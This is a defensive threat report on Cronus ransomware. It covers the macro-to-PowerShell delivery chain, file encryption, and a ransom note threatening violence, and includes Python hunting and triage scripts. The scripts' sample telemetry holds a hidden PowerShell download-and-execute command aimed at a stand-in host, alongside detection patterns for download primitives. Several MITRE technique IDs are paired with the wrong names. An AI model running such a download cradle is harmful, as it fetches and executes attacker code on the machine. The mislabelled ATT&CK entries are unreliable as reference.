Cronus: Ransomware Threatening Bodily Harm

Summary:
Cronus is a sophisticated ransomware strain developed using .NET technology, first reported by Seqrite. This analysis arose from the discovery of a malicious document presented as a PayPal invoice, which was submitted to VirusTotal. The investigation outlines the ransomware's method of file encryption, its persistence mechanisms, and a detailed examination of its ransom note.

The intrusion process begins when a user interacts with the malicious document, activating macros that prompt the download and execution of a PowerShell script. This script is responsible for loading the Cronus ransomware DLL. The entire chain of this malicious activity is documented, with all relevant samples available on VirusTotal for further inspection.

Once activated, the Cronus ransomware copies itself to the user’s AppData directory. It checks whether a copy already exists, and if so, deletes it to ensure a fresh execution. The malware then scans all accessible drives on the device, identifying folders and files eligible for encryption while deliberately excluding certain critical system directories and files, such as "windows" and "program files."
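The delivery chain described above (macro-enabled document, PowerShell download cradle, copy under AppData) is what a hunter would look for in process-creation telemetry. The following is an added example written for this summary, not code from Pulsedive or Seqrite. It assumes events from Sysmon Event ID 1, an EDR feed or similar have already been normalised into dicts with `id`, `image`, `parent_image` and `command_line` keys; the sample events are constructed for illustration and are not real Cronus artefacts.

```python
"""Hunting helper for the Cronus delivery chain: an Office document whose
macros launch PowerShell, which downloads a script that loads the ransomware
DLL, after which the malware copies itself under the user's AppData tree.

Added example, not code from Pulsedive or Seqrite. Assumes process-creation
telemetry normalised into dicts with 'id', 'image', 'parent_image' and
'command_line' keys. SAMPLE_EVENTS below are constructed for illustration.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download primitives; extend for your environment.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
# A binary running from C:\Users\<name>\AppData\... (where Cronus copies itself).
APPDATA_PATH = re.compile(r"\\users\\[^\\]+\\appdata\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    image_path = event.get("image", "")
    image = basename(image_path)
    parent = basename(event.get("parent_image", ""))
    cmdline = event.get("command_line", "")
    hits = []
    # Macro-enabled document spawning a script host (T1059.005 -> T1059.001).
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawned_powershell")
    # PowerShell pulling content from the network, as the Cronus loader does.
    if image in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(cmdline):
        hits.append("powershell_download_cradle")
    # Executable launched from a user's AppData tree.
    if image.endswith(".exe") and APPDATA_PATH.search(image_path):
        hits.append("exec_from_appdata")
    return hits


def hunt(events: list[dict]) -> dict[str, list[str]]:
    """Map event id -> matched rules, keeping only events that matched."""
    return {e["id"]: classify(e) for e in events if classify(e)}


# Constructed sample telemetry (not real Cronus artefacts).
SAMPLE_EVENTS = [
    {"id": "evt-1",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://invoice.invalid/stage.ps1')\""},
    {"id": "evt-2",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\AppData\Roaming\svc\host.exe",
     "command_line": "host.exe"},
    {"id": "evt-3",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": "chrome.exe"},
]

if __name__ == "__main__":
    for event_id, rules in hunt(SAMPLE_EVENTS).items():
        print(event_id, "->", ", ".join(rules))
```

The `exec_from_appdata` rule is deliberately broad: several legitimate applications (chat and update clients, for example) also run from AppData, so in practice it is paired with an allowlist or with the other two rules rather than alerted on alone. The first two rules are high-signal on their own and map directly to the T1059.005 and T1059.001 entries listed further down.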

Cronus employs AES encryption, with its methodology varying based on file size. For files smaller than 512 KB, the ransomware uses a single encryption function known as FULL_ENCRYPT, which processes the file with AES in Cipher Block Chaining (CBC) mode; CBC works on fixed-size blocks, chaining each block to the ciphertext of the one before it. For larger files, the ransomware splits the file into three sections and applies the encryption process to each section separately.

The ransomware targets a vast array of file types, appending a random five-character alphanumeric extension to each encrypted file. This is a deviation from other ransomware strains, which typically use a uniform extension for all encrypted files. The analysis includes a comprehensive list of targeted file extensions, highlighting the ransomware's broad reach across various document types, media files, and database formats.

Security Officer Comments:
Upon successful encryption of files, Cronus drops a ransom note named "cronus.txt." This note outlines the attackers' demands, threatening bodily harm to the victim and their family if the ransom is not paid. Unusually, the note offers no proof of data exfiltration, a common feature of other ransomware communications, and provides only an email contact for negotiations. Victims are instructed to pay $500 in Bitcoin, and the note promises a decryption tool in exchange for proof of payment. It also ominously warns that failure to comply could lead to live-streamed torture.
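The two on-disk artefacts the write-up gives a responder, the random five-character alphanumeric extension and the "cronus.txt" note, are enough for a first-pass triage of an affected volume. The following is an added example, not code from Pulsedive or Seqrite: it walks a mounted copy or image of the volume, skips the "windows" and "program files" directories the malware itself excludes, and flags files whose extension matches the pattern and whose content looks like ciphertext. The fixture files built in `demo()` are constructed for illustration, not recovered samples, and the entropy threshold and benign-extension list are assumptions to tune locally.

```python
"""Filesystem triage for the Cronus encryption artefacts: files renamed with
a random five-character alphanumeric extension, plus the "cronus.txt" note.

Added example, not code from Pulsedive or Seqrite. Assumes a mounted copy (or
forensic image) of the affected volume under the root passed to triage().
The fixture in demo() is constructed for illustration.
"""
import math
import os
import re
import tempfile
from collections import Counter
from pathlib import Path

RANSOM_NOTE = "cronus.txt"
RANDOM_EXT = re.compile(r"^[A-Za-z0-9]{5}$")
# Legitimate five-character extensions that would otherwise match (assumed list).
BENIGN_FIVE_CHAR_EXTS = {"class", "xhtml", "jsonl", "mpeg4", "woff2"}
# Cronus skips these directories, so the walk skips them as well.
SKIP_DIRS = {"windows", "program files"}
ENTROPY_THRESHOLD = 7.5  # bits per byte; ciphertext approaches 8.0 (assumed cut-off)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte of the given sample."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(path: Path, sample_size: int = 4096) -> bool:
    """True if the head, middle or tail of the file is near-random.

    Cronus encrypts larger files in three sections, so sampling three regions
    rather than only the head also catches schemes that leave plaintext gaps.
    """
    size = path.stat().st_size
    if size == 0:
        return False
    offsets = {0, size // 2, max(size - sample_size, 0)}
    samples = []
    with path.open("rb") as fh:
        for off in sorted(offsets):
            fh.seek(off)
            samples.append(fh.read(sample_size))
    return max(shannon_entropy(s) for s in samples) >= ENTROPY_THRESHOLD


def has_random_extension(filename: str) -> bool:
    """Five alphanumeric characters after the last dot, not on the benign list."""
    if "." not in filename:
        return False
    ext = filename.rsplit(".", 1)[1]
    return bool(RANDOM_EXT.match(ext)) and ext.lower() not in BENIGN_FIVE_CHAR_EXTS


def triage(root: Path) -> dict[str, list[str]]:
    """Walk root and collect ransom notes and probable encrypted files."""
    report = {"ransom_notes": [], "candidate_encrypted": []}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d.lower() not in SKIP_DIRS]
        for name in filenames:
            path = Path(dirpath) / name
            if name.lower() == RANSOM_NOTE:
                report["ransom_notes"].append(str(path))
            elif has_random_extension(name) and looks_encrypted(path):
                report["candidate_encrypted"].append(str(path))
    return report


def demo() -> dict[str, list[str]]:
    """Build a constructed fixture tree and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        docs = root / "Users" / "alice" / "Documents"
        docs.mkdir(parents=True)
        (docs / RANSOM_NOTE).write_text("constructed ransom note placeholder\n")
        # Random bytes stand in for ciphertext; > 512 KB exercises the 3-region sampling.
        (docs / "report.q7x2k").write_bytes(os.urandom(600 * 1024))
        # Random-looking extension but plain text inside: should not be flagged.
        (docs / "notes.abcde").write_text("plain text with a random-looking extension\n" * 50)
        (docs / "budget.xlsx").write_bytes(b"PK\x03\x04" + b"\x00" * 2048)
        # Lives under a directory Cronus skips, so triage skips it too.
        (root / "Windows" / "Temp").mkdir(parents=True)
        (root / "Windows" / "Temp" / "skipme.zzzzz").write_bytes(os.urandom(8192))
        return triage(root)


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {len(paths)}")
        for p in paths:
            print("  ", p)
```

The extension check alone is not enough, because compressed formats such as archives and images are also high-entropy and some legitimate extensions happen to be five characters long; requiring both an unrecognised five-character extension and near-random content keeps the candidate list short enough to review by hand. Each hit should still be confirmed against the original file name and a known-good copy before anything is restored.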

Notably, the specified Bitcoin wallet linked to the ransom note showed no transactions or activity as of October 4, 2024. This raises questions about the effectiveness of the ransomware's deployment and suggests that victims may be refusing to pay the ransom.

MITRE ATT&CK:

  • T1055: Process Hollowing
  • T1218: Reflective Code Loading
  • T1083: File and Directory Discovery
  • T1007: Process Discovery
  • T1059.001: Command and Scripting Interpreter: PowerShell
  • T1059.005: Command and Scripting Interpreter: Visual Basic
  • T1203: User Execution: Malicious File
  • T1486: Data Encrypted for Impact

Suggested Corrections:
Back up your data, system images, and configurations, test the backups regularly, and keep them offline: Backups should not be connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current offline backups is critical because, if your network data is encrypted by ransomware, your organization can still restore its systems.

Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.

Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?

Check your security team's work: Use a third-party penetration tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.

Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.

Train employees: Email remains the attack vector organizations are most exposed to. Users should be trained to spot and avoid phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.

Link(s):
https://blog.pulsedive.com/threat-research-cronus-ransomware-threatening-bodily-harm/